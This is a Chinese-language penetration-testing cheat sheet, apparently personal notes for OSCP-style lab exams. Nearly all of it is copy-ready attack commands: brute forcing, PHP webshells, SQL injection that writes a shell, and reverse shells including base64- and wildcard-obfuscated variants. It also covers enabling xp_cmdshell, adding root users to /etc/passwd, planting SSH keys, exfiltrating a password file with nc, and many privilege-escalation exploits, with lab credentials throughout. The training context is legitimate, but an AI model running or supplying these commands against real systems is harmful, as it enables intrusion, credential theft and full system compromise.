- 初期卡住看WP,看一步继续自己做
- 通关以后回看几个WP,看有没有新路子
- 有些exp试试改一下带不带URL最后/
- 有些端口连接要telnet和nc都试试
- 考试搜WP:关键词hack the box / tryhackme / ProvingGrounds
- 二进制程序先strings一下
- 看目录ls -al -R,windows里dir/a或tree /f,别漏隐藏文件
- 不明端口连上去输help试试
- 有wordpress的站打进去记得看数据库密码/var/www/html/wp-config.php
几个Payload页面:
Hack The Planet
Readme - PENETRATION NOTE
swisskyrepo/PayloadsAllTheThings
几个必备网站:
HackTricks - HackTricks
Exploit Database
GTFOBins
Online - Reverse Shell Generator
侦察
nmap
nmap --script vuln 192.168.146.60
nmap -sT -p- --min-rate 10000 10.129.138.220
udp扫描
nmap -vvv -sU -o nmapudp 10.129.138.220 --max-retries 0
或者
nmap -sU --top-ports 10 -sV 10.129.228.106
具体udp
nmap -p 161,500 -sV -sU -sC 10.129.138.220
21 FTP
# 遍历下载
wget -m --no-passive ftp://anonymous:anonymous@192.168.186.145
wget -r -c -nH -np ftp://10.1.1.68/ --ftp-user=steph --ftp-password=billabong
# 直接查看
ftp> more xxxx
80 扫目录
gobuster dir -u http://192.168.146.71:7331/ -w /usr/share/wordlists/dirb/big.txt -t 500
gobuster dir -u http://192.168.146.54 -w /home/fazx/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
dirsearch -u http://192.168.234.143/ -r -R 2 -x 404 -w /usr/share/wordlists/dirb/big.txt
# new dict
/cgi-bin/admin.cgi
/api/heartbeat.php
80 FUZZ, API
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.146.54/index.php?FUZZ=../location.txt
{GOBUSTER}/v1
{GOBUSTER}/v2
gobuster dir -u http://192.168.250.143 -w /usr/share/wordlists/dirb/big.txt -p pattern
80 wpscan
wpscan --url http://literally.vulnerable:65535/phpcms/ -t 20 --enumerate vt,vp,u (--passwords passwords)
80 hosts / cms
cmseek -u http://192.168.186.145/
whatweb http://192.168.50.244
echo "192.168.146.65 literally.vulnerable" >> /etc/hosts
有些资源加载不了,看F12改了hosts才行
135 RPC
rpcclient -U "" -N 192.168.186.145
for i in $(seq 500 1100); do
rpcclient -N -U "" 192.168.186.145 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
done
161 SNMP udp
snmp-check "192.168.233.145" -c public
snmpwalk -c public -v1 192.168.210.149
snmpbulkwalk -c public -v2c 10.10.11.136 .
https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp
445 smb
crackmapexec smb 192.168.186.145
crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares
crackmapexec smb ip -u 'anonymous' -p 'anonymous' --users
smbclient -N -L //192.168.186.145
smbclient -L //172.16.210.83/ -U medtech.com/wario --pw-nt-hash
smbclient \\\\10.10.10.131\\ADMIN$ -U Administrator
impacket-psexec -hashes 00000000000000000000000000000000:e728ecbadfb02f51ce8eed753f3ff3fd celia.almeda@10.10.140.142
1433 MSSQL
crackmapexec mssql ip -u sa -p pass --local-auth -x 'whoami'
impacket-mssqlclient sql_svc:Dolphin1@10.10.100.148 -windows-auth
sqsh -U sa -P poiuytrewq -S 10.11.1.31:1433
a'+or+'a'='a'+;exec+master..xp_cmdshell+'ping+192.168.119.169'--
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master..xp_cmdshell 'whoami'
3389 RDP
连接
xfreerdp /u:test /p:123 /v:10.10.100.148 /cert:ignore -wallpaper /drive:kali,/root/Desktop/exp/temp
# 配置文件
/u:mac
/p:IAmTheGOATSysAdmin!
/v:192.168.126.221
/cert:ignore
/drive:kali,/root/Desktop/exp
开启RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net stop termservice && net start termservice
LFI
思路:可以读/etc/passwd看用户名,再去用户目录下读私钥/home/user/.ssh/id_rsa
argument name is like view, file, page, skin, theme, lang, template, file inclusion is highly possible
?page=php://filter/convert.base64-encode/resource=view.php
windows LFI files
https://notchxor.github.io/oscp-notes/4-win-privesc/15-LFI-FILES/
爆破
字典
/usr/share/dirb/wordlists/common.txt
/usr/share/wfuzz/wordlist/others/common_pass.txt
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wfuzz/wordlist/general/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Hydra
hydra -l pinky -P /usr/share/dirb/wordlists/common.txt 192.168.146.54 -s 7654 http-post-form '/login.php:user=^USER^&pass=^PASS^:F=Invalid'
hydra -l admin -P /home/fazx/SecLists/Passwords/2020-200_most_used_passwords.txt "ignition.htb" http-post-form "/admin:form_key=WaEWxk61HqTZyMVP&login%5Busername%5D=admin&login%5Bpassword%5D=^PASS^:please sign in" -V
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.146.55 ssh
hydra -L /usr/share/wordlists/chaoji/dic_username_ftp.txt -P /usr/share/wordlists/chaoji/dic_password_ftp.txt 192.168.146.80 ftp
hydra 192.168.146.60 -P /usr/share/wordlists/rockyou.txt http-post-form '/kzMb5nVYJw/index.php:key=^PASS^:invalid' -la(相当于用户名随便输入个a)
hydra -l postgres -P /usr/share/wordlists/rockyou.txt 192.168.234.143 postgres
wpscan
wpscan --url http://127.0.0.1:1337/wordpress/ --wp-content-dir wp-content/ --proxy http://192.168.247.148:8080 --no-banner -U jerome -P /usr/share/wordlists/rockyou.txt
wpscan --url http://192.168.50.244 --enumerate ap --plugins-detection aggressive
aggressive模式可以扫出更多的插件, p是popular,vp vulnerable ,ap all
samba
枚举用户:
enum4linux -U 192.168.3.142
爆破密码
./acccheck.pl -t 192.168.3.142 -u smb -v
登陆查看
smbclient //192.168.3.142/smb -U smb
zip
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt sitebackup3.zip -v
zip2john sitebackup3.zip > zip.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
getshell
webshell
<?php system($_GET['cmd']); ?>
<?php echo passthru($_GET['cmd']);
UNION注入写shell
1' UNION SELECT 1,2,3,("<?php echo passthru($_GET['cmd']);") INTO OUTFILE '/var/www/html/tmp/123.php'#
反弹shell
https://www.revshells.com/
cme 执行powershell命令比较稳
# busybox shell捡漏nc -e / nc-c
busybox nc 192.168.146.55 8888 -e sh
# php一句话反弹
<?php $sock = fsockopen("192.168.146.55",8888); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
# windows reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.68 LPORT=3306 -f exe > evil.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.164 LPORT=21 -f exe > 21.exe
php -r ‘$sock=fsockopen(“192.168.146.58”,8888);exec(“/bin/sh -i <&3 >&3 2>&3”);’
echo "echo cGhwIC1yICckc29jaz1mc29ja29wZW4oIjE5Mi4xNjguMTQ2LjU4Iiw4ODg4KTtwb3BlbigiL2Jpbi9iYXNoIDwmMyA+JjMgMj4mMyIsICJyIik7Jw== | base64 -d" >> ../write.sh
echo "php -r $sock=fsockopen("192.168.146.58",8888);exec("/bin/sh -i <&3 >&3 2>&3");'" >> write.sh
?plot=;curl http://192.168.86.99/rshell443.txt --output rshell443.php
nc 192.168.146.55 9999 | /bin/bash | nc 192.168.146.55 8888
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.45.234 LPORT=443 -f exe > 443.exe
socat完全交互式shell
kali: socat file:`tty`,raw,echo=0 tcp-listen:8888
靶机:./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.146.55:8888
python半交互式
//半交互shell,在靶机执行
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty升级完全交互式
//完全交互式
//Kali下装了GNOME的zsh终端会有问题,回车变成^M无法使用
//所以先输入bash回归普通终端
# In Kali
$ bash
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali
$ stty raw -echo
$ fg
# In reverse shell
$ reset
如果询问Terminal type?可以输入xterm-256color,虽然但是vi可能会看不到字
所以一般就老实xterm或者dumb (echo $TERM)
Windows提权
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#ssh-keys-in-registry
https://benheater.com/thm-windows-privesc/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://zhuanlan.zhihu.com/p/428516577
先看权限
whoami /all
SeImpersonatePrivilege
PrintSpoofer64.exe -i -c cmd.exe
.\PrintSpoofer64.exe -i -c cmd.exe
PrintSpoofer64.exe -i -c "powershell.exe -e JABjAGwAa..."
certutil.exe -urlcache -split -f "http://192.168.45.234/PrintSpoofer64.exe"
看服务
certutil.exe -urlcache -split -f "http://192.168.45.164/PowerUp.ps1"
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell -exec bypass -Command "Import-Module .\PowerUp.ps1;Invoke-AllChecks"
schtasks /query /fo LIST /v
icacls "%ProgramFiles%\RUXIM\PLUGscheduler.exe"
accesschk.exe /accepeula -uwcqv "user"
Service unquoted path
powershell -ep bypass
. .\PowerUp.ps1
Get-UnquotedService
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe" 这个直接加用户了,方便 john/Password123!
Restart-Service GammaService
看漏洞
Winpeas
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://192.168.49.133/winPEASany.exe','c:\Users\rupert\Desktop\wp.exe')"
AlwaysInstallElevated MSI Abuse
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
都为1时,普通用户执行MSI具有SYSTEM权限
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.79 LPORT=443 -f msi > ~/Desktop/exp/shell443.msi
直接执行msi就行,下面是静默安装命令
msiexec /quiet /qn /i C:\Temp\setup.msi
手动找其他信息
SauronEye.exe -d C:\Users\ --filetypes .txt .xml .conf .log --contents --keywords password
type C:\Users\wario\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
#查看ps的历史命令文件
dir /s /b "ConsoleHost_history.txt"
# ssh
reg query HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys
reg query "HKCU\Software\OpenSSH\Agent\Key"
Linux提权
LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
wget http://192.168.146.55/linpeas.sh
Pspy
# 持续监测进程,弥补linpeas
wget https://hub.nuaa.cf/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
计划任务
grep "CRON" /var/log/cron.log
cat /etc/crontab
/etc/passwd
openssl passwd evil
echo "root2:EyCPXNrY/E2XE:0:0:root:/root:/bin/bash" >> /etc/passwd
echo "root4::0:0::/root:/bin/bash" >> /etc/passwd
不能通过ssh登录,只能从已有shell su过去
SUID
#Find all SUID binaries
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
(-perm 4000对应-rws)
# (可能需要有当前用户密码,这个在/etc/sudoers里定义
sudo -ll #Check commands you can execute with sudo
//list user's privileges or check a specific command; use twice for longer format
https://tttang.com/archive/1793/
特殊文件
可能出现看不到的计划任务,需要猜测改文件
# 查找对应用户的文件
find / -user demon 2>/dev/null | grep -Ev '/proc|/sys|/user'
find / -user www-data -ls 2>/dev/null | (grep -v proc)
# 查可写文件
find / -writable 2>/dev/null | grep -v proc
# 记得find -name是精确匹配
find / -name *penguin*
searchsploit
grep PRETTY /etc/os-release
searchsploit linux kernel ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/45010.c ./
gcc 45010.c –o 45010
覆盖环境变量提权
cd /tmp
echo “/bin/sh” > ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell
whoami
Pwnkit
https://github.com/arthepsy/CVE-2021-4034
user@debian:~$ grep PRETTY /etc/os-release
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
user@debian:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
It's all about the version.
According to https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py versions below these are vulnerable:
Ubuntu 20.04: 0.105-26ubuntu1.2
Ubuntu 21.10: 0.105-31ubuntu0.1
Ubuntu 18.04: 0.105-20ubuntu0.18.04.6
Debian stretch: 0.105-18+deb9u2
Debian buster: 0.105-25+deb10u1
Debian bullseye: 0.105-31+deb11u1
lxd提权
首先要在lxd group中,并且安装了lxc
https://reboare.github.io/lxd/lxd-escape.html
https://windsorwebdeveloper.com/web-developer-1-vulnhub-walkthrough/
ubuntu@ubuntu:~$ lxd init(都按默认一路回车)
ubuntu@ubuntu:~$ lxc init ubuntu:16.04 test -c security.privileged=true
Creating test
ubuntu@ubuntu:~$ lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
Device whatever added to test
ubuntu@ubuntu:~$ lxc start test
ubuntu@ubuntu:~$ lxc exec test bash
NFS提权
首先要/etc/exports文件中写的文件夹权限是no_root_squash
(in Kali)
# showmount -e 192.168.146.60
Export list for 192.168.146.60:
/home/user5 *
# mkdir nfstmp
# mount -t nfs 192.168.146.60:/home/user5 nfstmp 130 ⨯
# cd nfstmp
# cp /bin/sh ./nfsh
# chmod +s
(in target)
# ./sh -p
挂载共享后放个SUID文件再提权,实测这种方法不管是拷bash、编译c还是写python,都会产生文件euid和uid不相等的情况,这种情况下会实际以uid权限执行导致提权失败,因此sh要加-p参数不重置euid。
域内横向
搭建隧道
kali上
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
kali:
./proxy -selfcert
靶机:
agentw64.exe -connect 192.168.119.166:11601 -ignore-cert
kali:
>session
>ifconfig
另起一个命令行:
ip route add 10.10.56.0/24 dev ligolo #10.10.56.0是要去往的那个网段
>start
>端口转发功能:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
将靶机的1234端口转发到kali的4321端口
listener_add --addr 127.0.0.1:80 --to 0.0.0.0:80 --tcp
将kali的80端口转发到靶机的80端口
注意0.0.0.0 代表的就算agent地址
127.0.0.1 代表的是kali的地址,不需要换ip,直接用
文件相关
写文件
$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
cat > 2.txt <<EOF
this is test
this is test
this is test
EOF
写公钥
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdubHNkqPbAwD0ikkAKCWcEmxDNokB4gYle0ioj/NC/PA6wQjHRFOA32H/xGS1aGuTv3+xe9d7F4m6QuhZytNJ6QeVchqnf6zqg+0XlRyNxA3SUVxl2j+8fMgHeA92QqfWoIcknH/CaEWo5ZQTrSL4+A0hX2c7xMy2RyU4LEYxY3pEy9LayHmaqjHd3CKaeiDDDyEhSuGNPn1xPAOLB4h4idk88Ih50tu6rbl0hk/rEUCFYTTsWNtVy1u+uGAqimHv0xsYKQux1JLkymKYERXwTxSmNjK0Bx/d5IrI4oh4iUfnxqsvwcG6Sb6sKFwlhYypNgRr6zU3eZMltsSlc10j root@kali" > .ssh/authorized_keys
文件传输
nc.exe 192.168.45.201 80 < "C:\Users\offsec\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt"
nc -lp 80 > pass.txt
scp C:\windows.old\windows\system32\SAM root@10.10.100.147:/root/Desktop/
kali> impacket-smbserver myshare ./ -smb2
net use M: \\10.10.100.147:4455\myshare
cp a.exe M:
文件下载
certutil.exe -urlcache -split -f "http://192.168.45.234/PrintSpoofer64.exe"
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://192.168.49.133/winPEASany.exe','c:\Users\rupert\Desktop\wp.exe')"
查找文件内容
$ grep -R ".trash_old" /var/ 2>/dev/null
/var/spool/cron/crontabs/root:* * * * * /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
find / -type f | xargs grep tmp.py
其他
Python virtualenv
virtualenv .
source ./bin/active
./bin/deactivate
searchsploit
searchsploit -u # 更新库
searchsploit -m 50505 # 拷贝到本地
searchsploit -x 50505 # 查看exp内容
绕过
/bin/ech? bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjU2LjEwMyA2NjY2ICAK|/u?r/b?n/b?se64 -d|/bin/?h
echo+YnVzeWJveCBuYyAxOTIuMTY4LjE0Ni41NSA4ODg4IC1lIC9iaW4vYmFzaA==+|+base64+-d|sh
-t 'bash --noprofile' 绕过rbash
base64
//加密命令
echo "ls -l" | base64
//解密命令并执行
echo bHMgLWwK | base64 -d | sh